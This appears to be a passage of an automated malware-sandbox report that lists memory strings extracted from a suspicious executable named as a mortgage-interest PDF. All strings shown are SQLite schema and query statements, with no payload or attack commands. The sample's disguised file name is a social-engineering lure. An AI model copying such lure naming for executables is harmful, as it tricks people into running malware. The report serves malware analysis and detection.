Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT INTO ApplicationInstallLocation (AppId,InstallLocationId,InstallLocation,IsStandalone) VALUES (?1,COALESCE((SELECT MAX(InstallLocationId) + 1 FROM ApplicationInstallLocation WHERE AppId=?1),1),?3,?35);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT OR REPLACE INTO ApplicationFile (AppId, FileId) SELECT DISTINCT ?1, FileId FROM File f, (SELECT ApplicationInstallLocation.InstallLocation, ApplicationInstallLocation.IsStandalone, Application.InstallSource, Application.Version, Application.MSIfile FROM ApplicationInstallLocation INNER JOIN Application ON ApplicationInstallLocation.AppId = Application.AppId WHERE Application.AppId=?1 AND Application.Status != 'deleted' AND Application.IsStandalone = 'false') a WHERE (a.IsStandalone = 'false') AND (a.MSIfile=f.MSIfile) AND (a.MSIfile != '') AND f.IsScriptFile=?4 AND f.IsStandalone='false';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM File WHERE Sha256=?4;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2441979277.0000000003E01000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2439191366.00000000006B7000.00000008.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE File SET Stale=?5,LastUpdated=?70,LastSentTime=?71,Status='modified' WHERE Status !='new' AND Status != 'deleted';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT INTO Process (ProcessId,Pid,PPid,FileId,ParentPath,Name,SandboxName,PortalFlag,Reputation,User,Session,CommandLine,Lineage,LastUpdated,LastSentTime) VALUES (COALESCE((SELECT MAX(ProcessId) + 1 FROM Process),1),?1, ?2,?20,?3, ?4, ?5, ?6, ?7, ?8, ?9, ?10, ?11, ?70, ?71);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE ScanHistory SET ScanStatus=?21, ScanActive=?22, LastUpdated=?70 WHERE ScanActive='true';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM File WHERE FileId=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS DatabaseStatus (StatusId integer PRIMARY KEY,InitialScanCountinteger,InitialScanCountTimeinteger,ScanPerformedAfterEntitlementinteger,ScanPerformedAfterEntitlementTimeinteger,DeltaSequenceNumberinteger,FileSequenceNumberinteger,OperationIsActiveinteger);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE File SET Status='deleted',LastSentTime=0 WHERE FileId=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT Path,SHA256,Status FROM File WHERE FileId IN (SELECT DISTINCT FileId FROM ApplicationFile WHERE AppId=?1);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS Process (ProcessId integer PRIMARY KEY,Pid integer,PPidinteger,FileId integer,ParentPathtext NOT NULL,Name text NOT NULL,SandboxName text NOT NULL,PortalFlaginteger,Reputationtext,User text,Sessioninteger,CommandLine text,Lineage integer,LastUpdatedinteger,LastSentTimeinteger);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET Architecture=?54,LastUpdated=?70,LastSentTime=?71 WHERE AppId=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM File WHERE Stale=?5;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM File WHERE Path BETWEEN (?1 \|\| '\') AND (?1 \|\| 'hex(7F)');
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM ApplicationCode WHERE AppId=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT FileId,Path,Sha256 FROM File WHERE Status != 'deleted';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE Application SET Status='deleted',LastSentTime=0 WHERE AppId=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM ScanHistory WHERE AppCtrlIniSHA256=?10 AND ScanStatus!='completed';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT COUNT(*) FROM Process WHERE LastSentTime=?71;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT OR REPLACE INTO File (FileId,Path,ProcessName,Sha256,Stale,CompanyName,Publisher,Sigflags,ProductName,ApplicationLaunchPoint,Version,Description,ProductVersion,OriginalFilename,Size,IsStandalone,WhitelistDrift,WhitelistSource,WhitelistedTime,IsScriptFile,ModernApp,MSIfile,Status,normalized_path,FolderID,LastUpdated,LastSentTime) VALUES ((SELECT FileId FROM File WHERE Path=?1 AND Sha256=?4),?11, ?2,?24,?5,?6,?18,?19,?7,?8,?12,?13,?14,?15,?16,?35,?40,?41,?42,?50,?53,?54,?55,?60,?68,?70,?71);
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT DISTINCT AppId FROM Application INNER JOIN File ON (File.ProductName=Application.Name AND ((File.ProductVersion BETWEEN Application.Version AND (Application.Version \|\| 'hex(7F)')) OR (File.ProductVersion BETWEEN Application.ModifiedVersion AND (Application.ModifiedVersion \|\| 'hex(7F)'))) AND File.Status != 'unchanged');
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT FileId FROM File;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT AppId,Name,Version FROM Application WHERE ((Name=?2 AND Version LIKE ?3 AND Architecture LIKE ?10) OR (Application.AppId IN (SELECT Application.AppId FROM Application INNER JOIN ApplicationInstallLocation ON (ApplicationInstallLocation.InstallLocation=?60) WHERE Version LIKE ?3 AND Application.AppId=ApplicationInstallLocation.AppId)));
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT OR REPLACE INTO ApplicationFile (AppId, FileId) SELECT DISTINCT ?1, FileId FROM File f, (SELECT Application.Name, Application.Version, Application.ModifiedVersion, Application.InstallSource FROM Application WHERE Application.AppId=?1 AND Application.Status != 'deleted' AND Application.IsStandalone = 'false') a WHERE (f.ProductName=a.Name) AND ((f.ProductVersion BETWEEN a.Version AND (a.Version \|\| 'hex(7F)')) OR (f.ProductVersion BETWEEN a.ModifiedVersion AND (a.ModifiedVersion \|\| 'hex(7F)'))) AND f.IsScriptFile=?4 AND f.IsStandalone='false';
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT AppId FROM ApplicationFile WHERE FileId=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT * FROM Platform;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT Path,Sha256,Status FROM File WHERE FileId=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT AppId,Name,Version FROM Application WHERE ARPRegistryKey=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SELECT Path,Sha256,Status FROM File WHERE Path=?1;
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2324907056.0000000010375000.00000004.00001000.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 00000009.00000002.2323953234.0000000010119000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2415952110.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2426201068.0000000004B48000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2418692627.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, 0000000D.00000003.2422479886.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000013.00000000.2438293164.000000000061E000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE File SET WhitelistDrift=?11,WhitelistSource=?12,WhitelistedTime=?13,Stale=?5,LastUpdated=?70,LastSentTime=?71 WHERE Path=?1 AND Sha256 LIKE ?4 AND (WhitelistDrift!=?11 OR WhitelistedTime!=?13);
